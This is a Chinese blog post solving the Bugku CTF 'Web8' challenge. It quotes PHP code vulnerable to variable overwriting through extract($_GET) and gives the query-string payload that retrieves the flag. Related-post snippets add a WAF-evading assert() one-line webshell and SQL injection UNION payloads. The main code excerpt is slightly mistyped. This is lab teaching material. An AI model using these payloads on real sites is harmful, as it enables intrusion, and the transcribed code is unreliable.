bugku Web8

最新推荐文章于 2025-06-29 21:50:15 发布
最新推荐文章于 2025-06-29 21:50:15 发布
阅读量5.4k 收藏
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/anjiaowangmenghan/article/details/77647860
<?php
extract($_GET);
if (!empty($ac))
{
$f trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" .$flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}

?>

根据题目的提示我们猜测目录下有txt文件,于是我们试出了http://120.24.86.145:8002/web8/flag.txt下有flags

于是根据题意构造得http://120.24.86.145:8002/web8/?ac=flags&fn=flag.txt

便得到flag

如有疑问请联系qq:834368404

渗透漏洞Bugku CTF-Web8
weixin_52514668的博客
04-30 533
Bugku CTF-Web8一.开启环境二. 分析代码,发现本地文件包含漏洞三. 获取flag 一.开启环境 二. 分析代码,发现本地文件包含漏洞 直接将flag.php文件读入变量hello中 访问 三. 获取flag
Bugku Web专项(持续更新)
weixin_69065643的博客
07-30 493
点击网址访问网址,他让我们输入一个flag参数我们查看页面源代码他告诉我们有经常设置secret_key 变量可以知道要传入一个名为flag的参数,又说我们经常设置一个secret_key我们传入参数 /?得到flag进入网址和第一关一样,让我们输入一个flag参数,查看页面源代码没有什么有用的信息,我们看一下config。
bugku——web8
吃肉唐僧的博客
09-01 554
打开题目,看到extract函数 第一时间想到覆盖变量漏洞,构造?ac=&f= 但是发现有empty判空,无法绕过 后来发现题目有提示txt,访问flag.txt 结合代码的file_get_contents就很好判断了 构造poc如下,拿到flag ...
Bugku——WEB篇(持续更新ing)
最新发布
qq_52854348的博客
06-29 688
BUGKU-WEB 滑稽 计算器 alert 你必须让他停下 头等舱 GET POST source 矛盾 备份是个好习惯
Bugku web——web8
qq_40481505的博客
09-24 1201
打开连接,获得代码: <?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "<p>sorry!&...
bugku web8
wssmiss的博客
07-18 312
题目 分析 extract() 函数从数组中将变量导入到当前的符号表,该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。 该函数返回成功设置的变量数目 trim(string,charlist) 函数移除字符串两侧的空白字符或其他预定义字符。 php中的===与== 的区别: $str = “0d52”; If (0==$str) {...
Bugkuweb web8
qq_26961571的博客
09-08 420
​ 就一个提示,txt?? 完全摸不着头脑,怎么办。 打开之后这段php代码非常吸引人,只要满足条件即可显示flag。 首先一起看看需要满足的条件吧: ac不为0 trim()移除字符串两侧的空白字符或其他预定义字符。 file_get_contents()把整个文件读入一个字符串中。 ac值要等于f的值 关键就是这一步怎么做到呢???? 查询了资料之后发现,可以让文件fn里面的值等于ac的值,逻辑在于POST一个值进去,让POST的这个值是...
Bugku web-你必须让他停下来解题过程
2401_86440467的博客
08-16 814
尝试关闭JS(直接使用渗透版火狐将JS关闭),发现确实停下来了,但是flag还是没有出现。这时候知道,原网页停下来不重要,访问环境后,直接打开源代码不断刷新,flag即可出现。访问环境后发现网页一直在不断刷新,并且提示需要停下来,没什么思路,查看页面源代码。但是同时发现,jpg改变了,试着直接刷新源代码,发现jpg随刷新改变。猜测,有一个jpg对应flag,不断刷新,找到flag。发现使用JS,并且提示flag好像就这源代码中。(关闭JS方法还有其它,这里不过多赘述)
Bugku WEB shell
qq_41696858的博客
07-03 2330
1.打开场景,啥有没有,常规操作:查看源码,扫路径,抓包也是啥也没有 2.查看作者提示,送给大家一个过狗一句话 $poc=“a#s#s#e#r#t”; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) 其实就是运用拼接过waf,最后的运行结果是assert($_GET[‘s’]) 很明显assert是能执行shell命令的危险
BugkuWeb系列(持续更新~~~)
m0_59151303的博客
07-30 328
打开环境在输入框输入答案发现只能输入一位数,那我们想到修改输入框内容长度,我们右击页面点击检查,找到输入框的代码修改长度为10。本题是POST传参,我们通过火狐浏览器的HackBar传入post参数,根据页面的代码我们传入一个what=flag。本题是GET传参,我们在url上传入参数,根据页面的代码我们传入一个what=flag,得到flag。我们右击页面点击检查,查看页面代码,得到flag。进入环境,出现一个弹窗,点击确实发现什么也没有。点击验证,弹出窗口,得到flag。打开环境,发现一段PHP代码。
bugku-web-eval
m0_73303597的博客
11-30 1078
自用
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
BugkuCTF web8
3tu6b0rn的博客
05-15 530
代码审计 <?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "<p>sorry!</p>"; } } ...
bugku web1-8
xingkong23310的博客
11-20 331
1.web2 第一道题演示过了,查看网页源代码之后发现flag就藏在语句之中,nice 2. 计算器 通过源码发现这个网页输入结果的选项设置了maxlength=1,把它调大就可以输入正确结果返回flag 3. $GET GET一般用于获取/查询资源信息,GET请求的数据会附在URL之后(就是把数据放置在HTTP协议头中),以?分割URL和传输数据,参数之间以&相连。通过GET提交数据,用户名和密码将明文出现在URL上,所以可以直接在url上操作获取。 代码意为当what参数的内容=flag时
web——web8(110)——Bugku
Zichel77的博客
08-11 321
0×00 靶场链接 http://123.206.87.240:8002/web8/ 0×01 题目描述 0×02 解题过程 <?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "<p>sorry!&..
bugku web
沐目的博客
05-06 1064
bugku web8 可算是自己写出来一道代码审计的题,虽然比较简单。 <?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "&...
bugku web 8 (文件包含)wp
yanfangjie的博客
02-25 317
bugku web 8(文件包含) writeup <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> $_REQUEST[ ] 默认情况下包含了GET、_GET、G​ET、_POST、$_COOKIE的数组; 1、$_REQUEST可以接收_GET、POST、POST、_COOKIE发送的数据; 2
bugku-web8
烟敛寒林的博客
12-08 4908
题目地址:http://123.206.87.240:8002/web8/ 可以看出这是一道代码审计的题目。 方法一: 先根据 题目提示 txt??? 访问 flag.txt,发现其中内容 flags $ac是指flag.txt中的内容flags,$fn指的是flag.txt这个文件 Payload: ?ac=flags&fn=flag.txt 方...
Bugku——成绩单(web
csu_vc的博客
10-27 2420
可以大概判断出有四个字段 直接上payload-1' union select 1,2,3,database()# -1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#-1' union select 1,2,3,group_conc
Bugku WEB source githack
03-28
### Bugku WEB项目源码及其通过Githack在线查看的方法 #### 使用Githack访问Bugku WEB项目的源码 Githack 是一种无需克隆即可浏览 GitHub 上托管的仓库内容的服务。它允许开发者直接通过浏览器加载并查看基于分支的...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值